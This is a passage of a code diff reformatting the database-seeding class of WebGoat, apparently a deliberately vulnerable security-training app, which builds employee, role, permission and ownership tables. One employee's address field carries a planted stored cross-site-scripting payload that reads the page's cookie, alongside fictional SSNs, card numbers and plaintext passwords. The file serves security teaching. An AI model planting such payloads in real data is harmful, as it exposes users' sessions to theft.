+					+ "personal_description VARCHAR(60)" // We can be rude here
+					// + ",CONSTRAINT fl UNIQUE NONCLUSTERED (first_name, last_name)"
+					+ ")";
+
+			statement.executeUpdate(createTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error: unable to create employee table");
+		}
+
+		String insertData1 = "INSERT INTO employee VALUES (101, 'Larry', 'Stooge', '386-09-5451', 'larry',"
+				+ "'Technician','443-689-0192','9175 Guilford Rd','New York, NY', 102, 01012000,55000,'2578546969853547',"
+				+ "5000,'larry@stooges.com',010106,'Constantly harassing coworkers','Does not work well with others')";
+
+		String insertData2 = "INSERT INTO employee VALUES (102, 'Moe', 'Stooge', '936-18-4524','moe',"
+				+ "'CSO','443-938-5301', '3013 AMD Ave', 'New York, NY', 112, 03082003, 140000, 'NA', 0, 'moe@stooges.com', 0101013, "
+				+ "'Hit Curly over head', 'Very dominating over Larry and Curly')";
+
+		String insertData3 = "INSERT INTO employee VALUES (103, 'Curly', 'Stooge', '961-08-0047','curly',"
+				+ "'Technician','410-667-6654', '1112 Crusoe Lane', 'New York, NY', 102, 02122001, 50000, 'NA', 0, 'curly@stooges.com', 0101014, "
+				+ "'Hit Moe back', 'Owes three-thousand to company for fradulent purchases')";
+
+		String insertData4 = "INSERT INTO employee VALUES (104, 'Eric', 'Walker', '445-66-5565','eric',"
+				+ "'Engineer','410-887-1193', '1160 Prescott Rd', 'New York, NY', 107, 12152005, 13000, 'NA', 0, 'eric@modelsrus.com',0101013, "
+				+ "'Bothering Larry about webgoat problems', 'Late. Always needs help. Too intern-ish.')";
+
+		String insertData5 = "INSERT INTO employee VALUES (105, 'Tom', 'Cat', '792-14-6364','tom',"
+				+ "'Engineer','443-599-0762', '2211 HyperThread Rd.', 'New York, NY', 106, 01011999, 80000, '5481360857968521', 30000, 'tom@wb.com', 0, "
+				+ "'NA', 'Co-Owner.')";
+
+		String insertData6 = "INSERT INTO employee VALUES (106, 'Jerry', 'Mouse', '858-55-4452','jerry',"
+				+ "'Human Resources','443-699-3366', '3011 Unix Drive', 'New York, NY', 102, 01011999, 70000, '6981754825013564', 20000, 'jerry@wb.com', 0, "
+				+ "'NA', 'Co-Owner.')";
+
+		String insertData7 = "INSERT INTO employee VALUES (107, 'David', 'Giambi', '439-20-9405','david',"
+				+ "'Human Resources','610-521-8413', '5132 DIMM Avenue', 'New York, NY', 102, 05011999, 100000, '6981754825018101', 10000, 'david@modelsrus.com', 061402, "
+				+ "'Hacked into accounting server. Modified personal pay.', 'Strong work habbit. Questionable ethics.')";
+
+		String insertData8 = "INSERT INTO employee VALUES (108, 'Bruce', 'McGuirre', '707-95-9482','bruce',"
+				+ "'Engineer','610-282-1103', '8899 FreeBSD Drive<script>alert(document.cookie)</script> ', 'New York, NY', 107, 03012000, 110000, '6981754825854136', 30000, 'bruce@modelsrus.com', 061502, "
+				+ "'Tortuous Boot Camp workout at 5am. Employees felt sick.', 'Enjoys watching others struggle in exercises.')";
+
+		String insertData9 = "INSERT INTO employee VALUES (109, 'Sean', 'Livingston', '136-55-1046','sean',"
+				+ "'Engineer','610-878-9549', '6422 dFlyBSD Road', 'New York, NY', 107, 06012003, 130000, '6981754825014510', 5000, 'sean@modelsrus.com', 072804, "
+				+ "'Late to work 30 days in row due to excessive Halo 2', 'Has some fascination with Steelers. Go Ravens.')";
+
+		String insertData10 = "INSERT INTO employee VALUES (110, 'Joanne', 'McDougal', '789-54-2413','joanne',"
+				+ "'Human Resources','610-213-6341', '5567 Broadband Lane', 'New York, NY', 106, 01012001, 90000, '6981754825081054', 300, 'joanne@modelsrus.com', 112005, "
+				+ "'Used company cc to purchase new car. Limit adjusted.', 'Finds it necessary to leave early every day.')";
+
+		String insertData11 = "INSERT INTO employee VALUES (111, 'John', 'Wayne', '129-69-4572', 'john',"
+				+ "'CTO','610-213-1134', '129 Third St', 'New York, NY', 112, 01012001, 200000, '4437334565679921', 300, 'john@guns.com', 112005, "
+				+ "'', '')";
+		String insertData12 = "INSERT INTO employee VALUES (112, 'Neville', 'Bartholomew', '111-111-1111', 'socks',"
+				+ "'CEO','408-587-0024', '1 Corporate Headquarters', 'San Jose, CA', 112, 03012000, 450000, '4803389267684109', 300000, 'neville@modelsrus.com', 112005, "
+				+ "'', '')";
+
+		statement.executeUpdate(insertData1);
+		statement.executeUpdate(insertData2);
+		statement.executeUpdate(insertData3);
+		statement.executeUpdate(insertData4);
+		statement.executeUpdate(insertData5);
+		statement.executeUpdate(insertData6);
+		statement.executeUpdate(insertData7);
+		statement.executeUpdate(insertData8);
+		statement.executeUpdate(insertData9);
+		statement.executeUpdate(insertData10);
+		statement.executeUpdate(insertData11);
+		statement.executeUpdate(insertData12);
+
 	}
 
-	// Populate it
-	String insertData1 = "INSERT INTO user_data VALUES (101,'Joe','Snow','987654321','VISA',' ',0)";
-	String insertData2 = "INSERT INTO user_data VALUES (101,'Joe','Snow','2234200065411','MC',' ',0)";
-	String insertData3 = "INSERT INTO user_data VALUES (102,'John','Smith','2435600002222','MC',' ',0)";
-	String insertData4 = "INSERT INTO user_data VALUES (102,'John','Smith','4352209902222','AMEX',' ',0)";
-	String insertData5 = "INSERT INTO user_data VALUES (103,'Jane','Plane','123456789','MC',' ',0)";
-	String insertData6 = "INSERT INTO user_data VALUES (103,'Jane','Plane','333498703333','AMEX',' ',0)";
-	String insertData7 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','176896789','MC',' ',0)";
-	String insertData8 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','333300003333','AMEX',' ',0)";
-	String insertData9 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','673834489','MC',' ',0)";
-	String insertData10 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','33413003333','AMEX',' ',0)";
-	String insertData11 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','123609789','MC',' ',0)";
-	String insertData12 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','338893453333','AMEX',' ',0)";
-	String insertData13 = "INSERT INTO user_data VALUES (15613,'Joesph','Something','33843453533','AMEX',' ',0)";
-	statement.executeUpdate(insertData1);
-	statement.executeUpdate(insertData2);
-	statement.executeUpdate(insertData3);
-	statement.executeUpdate(insertData4);
-	statement.executeUpdate(insertData5);
-	statement.executeUpdate(insertData6);
-	statement.executeUpdate(insertData7);
-	statement.executeUpdate(insertData8);
-	statement.executeUpdate(insertData9);
-	statement.executeUpdate(insertData10);
-	statement.executeUpdate(insertData11);
-	statement.executeUpdate(insertData12);
-	statement.executeUpdate(insertData13);
-    }
-
-
-    private void createLoginTable(Connection connection) throws SQLException
-    {
-	Statement statement = connection.createStatement();
-
-	// Delete table if there is one
-	try
+	private void createRolesTable(Connection connection) throws SQLException
 	{
-	    String dropTable = "DROP TABLE user_login";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error dropping user_login table");
+		Statement statement = connection.createStatement();
+
+		try
+		{
+			String dropTable = "DROP TABLE roles";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error: unable to drop roles");
+		}
+
+		try
+		{
+			String createTable = "CREATE TABLE roles (" + "userid INT NOT NULL," + "role VARCHAR(10) NOT NULL,"
+					+ "PRIMARY KEY (userid, role)" + ")";
+
+			statement.executeUpdate(createTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error: Unable to create role table");
+		}
+
+		String insertData1 = "INSERT INTO roles VALUES (101, 'employee')";
+		String insertData2 = "INSERT INTO roles VALUES (102, 'manager')";
+		String insertData3 = "INSERT INTO roles VALUES (103, 'employee')";
+		String insertData4 = "INSERT INTO roles VALUES (104, 'employee')";
+		String insertData5 = "INSERT INTO roles VALUES (105, 'employee')";
+		String insertData6 = "INSERT INTO roles VALUES (106, 'hr')";
+		String insertData7 = "INSERT INTO roles VALUES (107, 'manager')";
+		String insertData8 = "INSERT INTO roles VALUES (108, 'employee')";
+		String insertData9 = "INSERT INTO roles VALUES (109, 'employee')";
+		String insertData10 = "INSERT INTO roles VALUES (110, 'hr')";
+		String insertData11 = "INSERT INTO roles VALUES (111, 'admin')";
+		String insertData12 = "INSERT INTO roles VALUES (112, 'admin')";
+
+		statement.executeUpdate(insertData1);
+		statement.executeUpdate(insertData2);
+		statement.executeUpdate(insertData3);
+		statement.executeUpdate(insertData4);
+		statement.executeUpdate(insertData5);
+		statement.executeUpdate(insertData6);
+		statement.executeUpdate(insertData7);
+		statement.executeUpdate(insertData8);
+		statement.executeUpdate(insertData9);
+		statement.executeUpdate(insertData10);
+		statement.executeUpdate(insertData11);
+		statement.executeUpdate(insertData12);
 	}
 
-	// Create the new table
-	try
+	private void createAuthTable(Connection connection) throws SQLException
 	{
-	    String createTableStatement = "CREATE TABLE user_login ("
-		    + "userid varchar(5)," + "webgoat_user varchar(20)" + ")";
-	    statement.executeUpdate(createTableStatement);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error creating user database");
-	    e.printStackTrace();
+		Statement statement = connection.createStatement();
+
+		try
+		{
+			String dropTable = "DROP TABLE auth";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error: unable to drop auth");
+		}
+
+		try
+		{
+			String createTable = "CREATE TABLE auth (" + "role VARCHAR(10) NOT NULL,"
+					+ "functionid VARCHAR(20) NOT NULL," + "PRIMARY KEY (role, functionid)" + ")";
+
+			statement.executeUpdate(createTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error: unable to create auth table");
+		}
+
+		String insertData1 = "INSERT INTO auth VALUES('employee', 'Logout')";
+		String insertData2 = "INSERT INTO auth VALUES('employee', 'ListStaff')";
+		String insertData3 = "INSERT INTO auth VALUES('employee', 'ViewProfile')";
+		String insertData4 = "INSERT INTO auth VALUES('employee', 'EditProfile')";
+		String insertData4_1 = "INSERT INTO auth VALUES('employee', 'SearchStaff')";
+		String insertData4_2 = "INSERT INTO auth VALUES('employee', 'FindProfile')";
+		String insertData5 = "INSERT INTO auth VALUES('manager', 'Logout')";
+		String insertData6 = "INSERT INTO auth VALUES('manager', 'ListStaff')";
+		String insertData7 = "INSERT INTO auth VALUES('manager', 'ViewProfile')";
+		String insertData7_1 = "INSERT INTO auth VALUES('manager', 'SearchStaff')";
+		String insertData7_2 = "INSERT INTO auth VALUES('manager', 'FindProfile')";
+		// String insertData8 = "INSERT INTO auth VALUES('manager', 'EditProfile')";
+		// String insertData9 = "INSERT INTO auth VALUES('manager', 'CreateProfile')";
+		// String insertData10 = "INSERT INTO auth VALUES('manager', 'DeleteProfile')";
+		// String insertData11 = "INSERT INTO auth VALUES('manager', 'UpdateProfile')";
+		String insertData12 = "INSERT INTO auth VALUES('hr', 'Logout')";
+		String insertData13 = "INSERT INTO auth VALUES('hr', 'ListStaff')";
+		String insertData14 = "INSERT INTO auth VALUES('hr', 'ViewProfile')";
+		String insertData15 = "INSERT INTO auth VALUES('hr', 'EditProfile')";
+		String insertData16 = "INSERT INTO auth VALUES('hr', 'CreateProfile')";
+		String insertData17 = "INSERT INTO auth VALUES('hr', 'DeleteProfile')";
+		String insertData18 = "INSERT INTO auth VALUES('hr', 'UpdateProfile')";
+		String insertData18_1 = "INSERT INTO auth VALUES('hr', 'SearchStaff')";
+		String insertData18_2 = "INSERT INTO auth VALUES('hr', 'FindProfile')";
+		String insertData19 = "INSERT INTO auth VALUES('admin', 'Logout')";
+		String insertData20 = "INSERT INTO auth VALUES('admin', 'ListStaff')";
+		String insertData21 = "INSERT INTO auth VALUES('admin', 'ViewProfile')";
+		String insertData22 = "INSERT INTO auth VALUES('admin', 'EditProfile')";
+		String insertData23 = "INSERT INTO auth VALUES('admin', 'CreateProfile')";
+		String insertData24 = "INSERT INTO auth VALUES('admin', 'DeleteProfile')";
+		String insertData25 = "INSERT INTO auth VALUES('admin', 'UpdateProfile')";
+		String insertData25_1 = "INSERT INTO auth VALUES('admin', 'SearchStaff')";
+		String insertData25_2 = "INSERT INTO auth VALUES('admin', 'FindProfile')";
+
+		// Add a permission for the webgoat role to see the source.
+		// The challenge(s) will change the default role to "challenge"
+		String insertData26 = "INSERT INTO auth VALUES('" + AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOURCE
+				+ "')";
+		String insertData27 = "INSERT INTO auth VALUES('" + AbstractLesson.USER_ROLE + "','" + WebSession.SHOWHINTS
+				+ "')";
+		// Add a permission for the webgoat role to see the solution.
+		// The challenge(s) will change the default role to "challenge"
+		String insertData28 = "INSERT INTO auth VALUES('" + AbstractLesson.USER_ROLE + "','" + WebSession.SHOWSOLUTION
+				+ "')";
+
+		statement.executeUpdate(insertData1);
+		statement.executeUpdate(insertData2);
+		statement.executeUpdate(insertData3);
+		statement.executeUpdate(insertData4);
+		statement.executeUpdate(insertData4_1);
+		statement.executeUpdate(insertData4_2);
+		statement.executeUpdate(insertData5);
+		statement.executeUpdate(insertData6);
+		statement.executeUpdate(insertData7);
+		statement.executeUpdate(insertData7_1);
+		statement.executeUpdate(insertData7_2);
+		// statement.executeUpdate(insertData8);
+		// statement.executeUpdate(insertData9);
+		// statement.executeUpdate(insertData10);
+		// statement.executeUpdate(insertData11);
+		statement.executeUpdate(insertData12);
+		statement.executeUpdate(insertData13);
+		statement.executeUpdate(insertData14);
+		statement.executeUpdate(insertData15);
+		statement.executeUpdate(insertData16);
+		statement.executeUpdate(insertData17);
+		statement.executeUpdate(insertData18);
+		statement.executeUpdate(insertData18_1);
+		statement.executeUpdate(insertData18_2);
+		statement.executeUpdate(insertData19);
+		statement.executeUpdate(insertData20);
+		statement.executeUpdate(insertData21);
+		statement.executeUpdate(insertData22);
+		statement.executeUpdate(insertData23);
+		statement.executeUpdate(insertData24);
+		statement.executeUpdate(insertData25);
+		statement.executeUpdate(insertData25_1);
+		statement.executeUpdate(insertData25_2);
+		statement.executeUpdate(insertData26);
+		statement.executeUpdate(insertData27);
+		statement.executeUpdate(insertData28);
 	}
 
-    }
-
-
-    /**
-     * Description of the Method
-     *
-     * @param connection Description of the Parameter
-     *
-     * @exception SQLException Description of the Exception
-     */
-    private void createWeatherDataTable(Connection connection)
-	    throws SQLException
-    {
-	Statement statement = connection.createStatement();
-
-	// Delete table if there is one
-	try
+	private void createOwnershipTable(Connection connection) throws SQLException
 	{
-	    String dropTable = "DROP TABLE weather_data";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error dropping weather database");
+		Statement statement = connection.createStatement();
+
+		try
+		{
+			String dropTable = "DROP TABLE ownership";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error: unable to drop ownership");
+		}
+
+		try
+		{
+			String createTable = "CREATE TABLE ownership (" + "employer_id INT NOT NULL," + "employee_id INT NOT NULL,"
+					+ "PRIMARY KEY (employee_id, employer_id)" + ")";
+
+			statement.executeUpdate(createTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error: unable to create ownership table");
+		}
+
+		String inputData = "INSERT INTO ownership VALUES (112, 101)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 102)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 103)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 104)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 105)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 106)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 107)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 108)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 109)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 110)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 111)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (112, 112)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (102, 101)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 102)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 103)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 104)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 105)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 106)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 107)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 108)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 109)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 110)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (102, 111)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (111, 101)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 102)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 103)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 104)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 105)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 106)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 107)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 108)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 109)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 110)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (111, 111)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (106, 105)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (106, 106)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (106, 110)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (101, 101)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (103, 103)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (107, 104)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (107, 108)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (107, 109)";
+		statement.executeUpdate(inputData);
+		inputData = "INSERT INTO ownership VALUES (107, 107)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (105, 105)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (110, 110)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (104, 104)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (108, 108)";
+		statement.executeUpdate(inputData);
+
+		inputData = "INSERT INTO ownership VALUES (109, 109)";
+		statement.executeUpdate(inputData);
+
 	}
 
-	// Create the new table
-	try
+	// --------------------------------------------------------------------------
+	//
+	// End of WebGoat Financials
+	//
+	// --------------------------------------------------------------------------
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param connection
+	 *            Description of the Parameter
+	 * 
+	 * @exception SQLException
+	 *                Description of the Exception
+	 */
+	public void makeDB(Connection connection) throws SQLException
 	{
-	    String createTableStatement = "CREATE TABLE weather_data ("
-		    + "station int not null," + "name varchar(20) not null,"
-		    + "state char(2) not null," + "min_temp int not null,"
-		    + "max_temp int not null" + ")";
-	    statement.executeUpdate(createTableStatement);
+		System.out.println("Successful connection to database");
+		createUserDataTable(connection);
+		createLoginTable(connection);
+		createUserAdminTable(connection);
+		createProductTable(connection);
+		createMessageTable(connection);
+		createEmployeeTable(connection);
+		createRolesTable(connection);
+		createAuthTable(connection);
+		createOwnershipTable(connection);
+		createWeatherDataTable(connection);
+		System.out.println("Success: creating tables.");
 	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error creating weather database");
-	    e.printStackTrace();
-	}
-
-	// Populate it
-	String insertData1 = "INSERT INTO weather_data VALUES (101,'Columbia','MD',-10,102)";
-	String insertData2 = "INSERT INTO weather_data VALUES (102,'Seattle','WA',-15,90)";
-	String insertData3 = "INSERT INTO weather_data VALUES (103,'New York','NY',-10,110)";
-	String insertData4 = "INSERT INTO weather_data VALUES (104,'Houston','TX',20,120)";
-	String insertData5 = "INSERT INTO weather_data VALUES (10001,'Camp David','MD',-10,100)";
-	String insertData6 = "INSERT INTO weather_data VALUES (11001,'Ice Station Zebra','NA',-60,30)";
-	statement.executeUpdate(insertData1);
-	statement.executeUpdate(insertData2);
-	statement.executeUpdate(insertData3);
-	statement.executeUpdate(insertData4);
-	statement.executeUpdate(insertData5);
-	statement.executeUpdate(insertData6);
-    }
-
-
-    //--------------------------------------------------------------------------
-    //--------------------------------------------------------------------------
-    //
-    //  The tables below are for WebGoat Financials
-    //
-    //  DO NOT MODIFY THESE TABLES - unless you change the org chart
-    //								 and access control matrix documents
-    //
-    //--------------------------------------------------------------------------
-    //--------------------------------------------------------------------------
-
-    private void createEmployeeTable(Connection connection) throws SQLException
-    {
-	Statement statement = connection.createStatement();
-
-	try
-	{
-	    String dropTable = "DROP TABLE employee";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error: unable to drop employee table");
-	}
-
-	// Create Table
-	try
-	{
-	    String createTable = "CREATE TABLE employee ("
-		    //+ "userid INT GENERATED ALWAYS AS IDENTITY PRIMARY KEY,"
-		    + "userid INT NOT NULL PRIMARY KEY,"
-		    + "first_name VARCHAR(20)," + "last_name VARCHAR(20),"
-		    + "ssn VARCHAR(12)," + "password VARCHAR(10),"
-		    + "title VARCHAR(20)," + "phone VARCHAR(13),"
-		    + "address1 VARCHAR(80)," + "address2 VARCHAR(80),"
-		    + "manager INT," + "start_date CHAR(8)," + "salary INT,"
-		    + "ccn VARCHAR(30)," + "ccn_limit INT,"
-		    + "email VARCHAR(30)," // reason for the recent write-up
-		    + "disciplined_date CHAR(8)," // date of write up, NA otherwise
-		    + "disciplined_notes VARCHAR(60)," // reason for the recent write-up
-		    + "personal_description VARCHAR(60)" // We can be rude here
-		    //+ ",CONSTRAINT fl UNIQUE NONCLUSTERED (first_name, last_name)"
-		    + ")";
-
-	    statement.executeUpdate(createTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error: unable to create employee table");
-	}
-
-	String insertData1 = "INSERT INTO employee VALUES (101, 'Larry', 'Stooge', '386-09-5451', 'larry',"
-		+ "'Technician','443-689-0192','9175 Guilford Rd','New York, NY', 102, 01012000,55000,'2578546969853547',"
-		+ "5000,'larry@stooges.com',010106,'Constantly harassing coworkers','Does not work well with others')";
-
-	String insertData2 = "INSERT INTO employee VALUES (102, 'Moe', 'Stooge', '936-18-4524','moe',"
-		+ "'CSO','443-938-5301', '3013 AMD Ave', 'New York, NY', 112, 03082003, 140000, 'NA', 0, 'moe@stooges.com', 0101013, "
-		+ "'Hit Curly over head', 'Very dominating over Larry and Curly')";
-
-	String insertData3 = "INSERT INTO employee VALUES (103, 'Curly', 'Stooge', '961-08-0047','curly',"
-		+ "'Technician','410-667-6654', '1112 Crusoe Lane', 'New York, NY', 102, 02122001, 50000, 'NA', 0, 'curly@stooges.com', 0101014, "
-		+ "'Hit Moe back', 'Owes three-thousand to company for fradulent purchases')";
-
-	String insertData4 = "INSERT INTO employee VALUES (104, 'Eric', 'Walker', '445-66-5565','eric',"
-		+ "'Engineer','410-887-1193', '1160 Prescott Rd', 'New York, NY', 107, 12152005, 13000, 'NA', 0, 'eric@modelsrus.com',0101013, "
-		+ "'Bothering Larry about webgoat problems', 'Late. Always needs help. Too intern-ish.')";
-
-	String insertData5 = "INSERT INTO employee VALUES (105, 'Tom', 'Cat', '792-14-6364','tom',"
-		+ "'Engineer','443-599-0762', '2211 HyperThread Rd.', 'New York, NY', 106, 01011999, 80000, '5481360857968521', 30000, 'tom@wb.com', 0, "
-		+ "'NA', 'Co-Owner.')";
-
-	String insertData6 = "INSERT INTO employee VALUES (106, 'Jerry', 'Mouse', '858-55-4452','jerry',"
-		+ "'Human Resources','443-699-3366', '3011 Unix Drive', 'New York, NY', 102, 01011999, 70000, '6981754825013564', 20000, 'jerry@wb.com', 0, "
-		+ "'NA', 'Co-Owner.')";
-
-	String insertData7 = "INSERT INTO employee VALUES (107, 'David', 'Giambi', '439-20-9405','david',"
-		+ "'Human Resources','610-521-8413', '5132 DIMM Avenue', 'New York, NY', 102, 05011999, 100000, '6981754825018101', 10000, 'david@modelsrus.com', 061402, "
-		+ "'Hacked into accounting server. Modified personal pay.', 'Strong work habbit. Questionable ethics.')";
-
-	String insertData8 = "INSERT INTO employee VALUES (108, 'Bruce', 'McGuirre', '707-95-9482','bruce',"
-		+ "'Engineer','610-282-1103', '8899 FreeBSD Drive<script>alert(document.cookie)</script> ', 'New York, NY', 107, 03012000, 110000, '6981754825854136', 30000, 'bruce@modelsrus.com', 061502, "
-		+ "'Tortuous Boot Camp workout at 5am. Employees felt sick.', 'Enjoys watching others struggle in exercises.')";
-
-	String insertData9 = "INSERT INTO employee VALUES (109, 'Sean', 'Livingston', '136-55-1046','sean',"
-		+ "'Engineer','610-878-9549', '6422 dFlyBSD Road', 'New York, NY', 107, 06012003, 130000, '6981754825014510', 5000, 'sean@modelsrus.com', 072804, "
-		+ "'Late to work 30 days in row due to excessive Halo 2', 'Has some fascination with Steelers. Go Ravens.')";
-
-	String insertData10 = "INSERT INTO employee VALUES (110, 'Joanne', 'McDougal', '789-54-2413','joanne',"
-		+ "'Human Resources','610-213-6341', '5567 Broadband Lane', 'New York, NY', 106, 01012001, 90000, '6981754825081054', 300, 'joanne@modelsrus.com', 112005, "
-		+ "'Used company cc to purchase new car. Limit adjusted.', 'Finds it necessary to leave early every day.')";
-
-	String insertData11 = "INSERT INTO employee VALUES (111, 'John', 'Wayne', '129-69-4572', 'john',"
-		+ "'CTO','610-213-1134', '129 Third St', 'New York, NY', 112, 01012001, 200000, '4437334565679921', 300, 'john@guns.com', 112005, "
-		+ "'', '')";
-	String insertData12 = "INSERT INTO employee VALUES (112, 'Neville', 'Bartholomew', '111-111-1111', 'socks',"
-		+ "'CEO','408-587-0024', '1 Corporate Headquarters', 'San Jose, CA', 112, 03012000, 450000, '4803389267684109', 300000, 'neville@modelsrus.com', 112005, "
-		+ "'', '')";
-
-	statement.executeUpdate(insertData1);
-	statement.executeUpdate(insertData2);
-	statement.executeUpdate(insertData3);
-	statement.executeUpdate(insertData4);
-	statement.executeUpdate(insertData5);
-	statement.executeUpdate(insertData6);
-	statement.executeUpdate(insertData7);
-	statement.executeUpdate(insertData8);
-	statement.executeUpdate(insertData9);
-	statement.executeUpdate(insertData10);
-	statement.executeUpdate(insertData11);
-	statement.executeUpdate(insertData12);
-
-    }
-
-
-    private void createRolesTable(Connection connection) throws SQLException
-    {
-	Statement statement = connection.createStatement();
-
-	try
-	{
-	    String dropTable = "DROP TABLE roles";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error: unable to drop roles");
-	}
-
-	try
-	{
-	    String createTable = "CREATE TABLE roles ("
-		    + "userid INT NOT NULL," + "role VARCHAR(10) NOT NULL,"
-		    + "PRIMARY KEY (userid, role)" + ")";
-
-	    statement.executeUpdate(createTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error: Unable to create role table");
-	}
-
-	String insertData1 = "INSERT INTO roles VALUES (101, 'employee')";
-	String insertData2 = "INSERT INTO roles VALUES (102, 'manager')";
-	String insertData3 = "INSERT INTO roles VALUES (103, 'employee')";
-	String insertData4 = "INSERT INTO roles VALUES (104, 'employee')";
-	String insertData5 = "INSERT INTO roles VALUES (105, 'employee')";
-	String insertData6 = "INSERT INTO roles VALUES (106, 'hr')";
-	String insertData7 = "INSERT INTO roles VALUES (107, 'manager')";
-	String insertData8 = "INSERT INTO roles VALUES (108, 'employee')";
-	String insertData9 = "INSERT INTO roles VALUES (109, 'employee')";
-	String insertData10 = "INSERT INTO roles VALUES (110, 'hr')";
-	String insertData11 = "INSERT INTO roles VALUES (111, 'admin')";
-	String insertData12 = "INSERT INTO roles VALUES (112, 'admin')";
-
-	statement.executeUpdate(insertData1);
-	statement.executeUpdate(insertData2);
-	statement.executeUpdate(insertData3);
-	statement.executeUpdate(insertData4);
-	statement.executeUpdate(insertData5);
-	statement.executeUpdate(insertData6);
-	statement.executeUpdate(insertData7);
-	statement.executeUpdate(insertData8);
-	statement.executeUpdate(insertData9);
-	statement.executeUpdate(insertData10);
-	statement.executeUpdate(insertData11);
-	statement.executeUpdate(insertData12);
-    }
-
-
-    private void createAuthTable(Connection connection) throws SQLException
-    {
-	Statement statement = connection.createStatement();
-
-	try
-	{
-	    String dropTable = "DROP TABLE auth";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error: unable to drop auth");
-	}
-
-	try
-	{
-	    String createTable = "CREATE TABLE auth ("
-		    + "role VARCHAR(10) NOT NULL,"
-		    + "functionid VARCHAR(20) NOT NULL,"
-		    + "PRIMARY KEY (role, functionid)" + ")";
-
-	    statement.executeUpdate(createTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error: unable to create auth table");
-	}
-
